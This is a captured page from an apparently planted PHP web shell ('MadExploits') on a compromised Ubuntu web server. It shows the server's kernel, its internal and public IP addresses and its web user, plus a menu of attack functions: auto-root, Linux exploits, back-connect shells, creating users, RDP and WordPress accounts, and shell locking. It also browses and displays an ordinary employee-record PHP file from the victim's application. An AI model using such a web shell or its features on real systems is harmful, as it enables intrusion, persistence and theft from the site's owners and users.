Linux 0193-eed-moe-app01 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
Apache/2.4.52 (Ubuntu)
: 172.16.229.234 | : 18.116.21.127
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.18
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
eedpims /
officeemployee /
[ HOME SHELL ]
Name
Size
Permission
Action
officeemployee.php
2.93
KB
-rw-r--r--
officeemployee_editor.php
3.88
KB
-rw-r--r--
officeemployee_list.php
5.51
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : officeemployee.php
<?php session_start(); include("../common/config.php"); include("../common/functions.php"); if(empty($_SESSION["username"])) { Header("Location: ../login/login.php"); } $cmd = $_REQUEST["cmd"]; switch($cmd) { case "add": if(empty($_REQUEST["id"])) { //Data Insert $stmt = $conn->prepare("INSERT INTO officeemployee (office_id,designation_id,nopost) VALUES (?,?,?)"); $stmt->bind_param("iis", $_REQUEST["office_id"], $_REQUEST["designation_id"], englishnum($_REQUEST["nopost"]) ); $stmt->execute(); $stmt->close(); } else { //Data Update $stmt = $conn->prepare("UPDATE officeemployee SET office_id = ?, designation_id = ?, nopost = ? WHERE id = ?"); $stmt->bind_param("iisi", $_REQUEST["office_id"], $_REQUEST["designation_id"], englishnum($_REQUEST["nopost"]), $_REQUEST["id"]); $stmt->execute(); $stmt->close(); } Header("Location: ../officeemployee/officeemployee.php?cmd=list"); break; case "edit": $Id = $_REQUEST["id"]; if( !empty($Id )) { // prepare and bind $stmt = $conn->prepare("SELECT * FROM officeemployee WHERE id = ?"); $stmt->bind_param("i",$_REQUEST["id"]); $stmt->execute(); //Result $result = $stmt->get_result(); //Data Retriving while($row = $result->fetch_assoc()) { $Id = $row["id"]; $office_id = $row["office_id"]; $designation_id = $row["designation_id"]; $nopost = $row["nopost"]; } $stmt->close(); } include("../officeemployee/officeemployee_editor.php"); break; case "delete": $Id = $_REQUEST["id"]; if($Id) { //$db->delete($info); } include("../officeemployee/officeemployee_list.php"); break; case "list" : if(!empty($_REQUEST["page"])&&$_SESSION["search"]=="yes") { $_SESSION["search"]="yes"; } else { $_SESSION["search"]="no"; unset($_SESSION["search"]); unset($_SESSION["field_value"]); } include("../officeemployee/officeemployee_list.php"); break; case "search_officeemployee": $_REQUEST["page"] = 1; $_SESSION["search"]="yes"; $_SESSION["field_value"] = $_REQUEST["field_value"]; include("../officeemployee/officeemployee_list.php"); break; default : include("../officeemployee/officeemployee_editor.php"); } ?>
Close